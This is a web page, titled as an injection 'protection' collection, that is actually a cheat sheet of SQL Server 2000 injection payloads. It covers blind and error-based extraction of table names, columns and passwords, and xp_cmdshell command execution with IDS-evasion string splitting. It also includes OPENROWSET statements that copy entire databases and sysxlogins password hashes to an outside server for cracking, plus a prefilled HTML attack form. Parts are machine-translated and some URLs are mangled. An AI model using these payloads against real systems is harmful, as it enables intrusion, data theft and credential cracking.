SoFunction
Updated on 2025-04-11

SQL Server 2000 Injection Protection Collection (II)

SQL Server 2000 Injection Protection Collection (II)

Traditional query construction:
select * FROM news where id=... AND topic=... AND .....
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'
select 123;--
;use master;--
:a' or name like 'ffff%';-- Shows a user named ffff.
'and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--

illustrate:
The above statement is to get the first user table in the database and place the table name in the ffff user's mailbox field.
By viewing ffff's user information, you can get the first table called ad
Then get the ID of this table based on the table name ad
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

You can get the name of the second table like below
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2)
where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2)
where name='ffff';--

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

Extended storage can be called through general methods:
exec xp_webserver

Once this extended storage has been executed, it can be deleted like this:
sp_dropextendedproc 'xp_webserver'

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+
char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, 'admin''--', 'password', 0xffff)-

;and user>0
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 // is the access database

Some introductions to the usual injection:
A) ID=49 The parameters injected in this type are numerical, and the original appearance of the SQL statement is roughly as follows:
select * from table name where field=49
The injected parameter is ID=49 And [Query Condition], which is the generation statement:
select * from table name where field=49 And [Query condition]

(B) Class=Serial The parameters injected in this type are character types, and the original appearance of SQL statements is roughly as follows:
select * from table name where field = 'Serial'
The injected parameters are Class=Serials' and [Query Conditions] and ''=' , which is the generation statement:
select * from table name where field = 'Serial' and [Query Condition] and ''=''

(C) If there are no filtering parameters during search, such as keyword= keyword, the original appearance of the SQL statement is roughly as follows:
select * from table name where field like '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=', which is the generated statement:
select * from table name where field like '%' and [Query condition] and '%'='%'
;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects is a SQLServer system table that stores all table names, views, constraints and other objects. xtype='U' and status>0 represents the table name created by the user. The above statement takes out the first table name and compares the size with 0, so that the error message can expose the table name.

;;and (select Top 1 col_name(object_id('table name'),1) from sysobjects)>0
After getting the table name from ⑤, use object_id ('table name') to get the internal ID corresponding to the table name. Col_name (table name ID, 1) represents the first field name of the table. Change 1 to 2, 3, 4... and you can get the field names in the guessed table one by one.

Content: Mainly for easy input.


<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=/ target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>

Enumerate his data table name:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

This is to update the first table name to the field of aaa.

Read the first table, and the second table can be read out like this (add and name<>'The table name just obtained' after the condition).
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

Then id=1552 and exists(select * from aaa where aaa>5)

Read out the second table, read out one by one until nothing is left.

The read field is like this:
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table name'),1));-

Then there is an error in id=1552 and exists(select * from aaa where aaa>5) and get the field name
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table name'),2));-
Then there is an error in id=1552 and exists(select * from aaa where aaa>5) and get the field name

Advanced Tips:

[Get the data table name][Update the field value to the table name, and then think of reading the value of this field to get the table name]
update table name set field=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'The table name you get' Find one plus one]) [ where condition]
select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)

Build a database administrator account and system administrator account through SQLSERVER injection vulnerability [the current account must be a SYSADMIN group]

[Get the data table field name][Update the field value to the field name, and then think of reading the value of this field to get the field name]
update table name set field =(select top 1 col_name(object_id('name of the data table to be queried'), field columns are as follows: 1) [where condition]

Bypass IDS detection [using variables]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

1. Turn on the remote database
Basic syntax
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

Parameters: (1) OLEDB Provider name

2. The connection string parameter can be used for any and ports, for example
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

To replicate the entire database of the target host, you must first establish a connection with the database on the target host (how to establish a remote connection on the target host, as mentioned just now), and then insert all remote tables to the local table.

Basic syntax:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2

This line of statement copies all data in the table2 table on the target host to the table1 table in the remote database. In actual use, appropriately modify the IP address and port of the connection string to point to the required places, such as:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from table2

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysdatabases')
select * from

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects')
select * from user_database.

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns')
select * from user_database.

After that, you can see the library structure of the target host from the local database. This is easy to do. If you don’t talk much about it, copy the database:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from database..table1

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table2') select * from database..table2

......

3. Copy the Hash table (HASH)

This is actually an extended application of the above replicated database. The hash of the login password is stored in sysxlogins. The method is as follows:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from

After obtaining the hash, you can brute-force cracking. It takes a little luck and a lot of time.

Methods to traverse directories:
Create a temporary table first: temp
'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec .xp_availablemedia;- Get all current drives
5';insert into temp(id) exec .xp_subdirs 'c:\';-- Get a list of subdirectories
5';insert into temp(id,num1) exec .xp_dirtree 'c:\';-- Get the directory tree structure of all subdirectories and enter the temp table

5';insert into temp(id) exec .xp_cmdshell 'type c:\web\';-- View the contents of a file
5';insert into temp(id) exec .xp_cmdshell 'dir c:\';--
5';insert into temp(id) exec .xp_cmdshell 'dir c:\ *.asp /s/a';--
5';insert into temp(id) exec .xp_cmdshell 'cscript C:\Inetpub\AdminScripts\ enum w3svc'

5';insert into temp(id,num1) exec .xp_dirtree 'c:\';-- (xp_dirtree applicable permissions PUBLIC)
Write to the table:
Statement 1: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-
Statement 2: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));-
Statement 3: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));-
Statement 4: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-
Statement 5: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-
Statement 6: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));-
Statement 7: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-
Statement 8: _blank>/down/?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-
Statement 9: _blank>/down/?id=1 and 1=(select IS_MEMBER('db_owner'));-
Write the path to the table:
_blank>/down/?id=1;create table dirs(paths varchar(100), id int)-
_blank>http:///down/?id=1;insert  dirs exec .xp_dirtree 'c:\'-
_blank>http:///down/?id=1 and 0<>(select top 1 paths from dirs)-
_blank>http:///down/?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
Statement: _blank>http:///down/?id=1;create table dirs1(paths varchar(100), id int)--
Statement: _blank>http:///down/?id=1;insert dirs exec .xp_dirtree 'e:\web'--
Statement: _blank>http:///down/?id=1 and 0<>(select top 1 paths from dirs1)-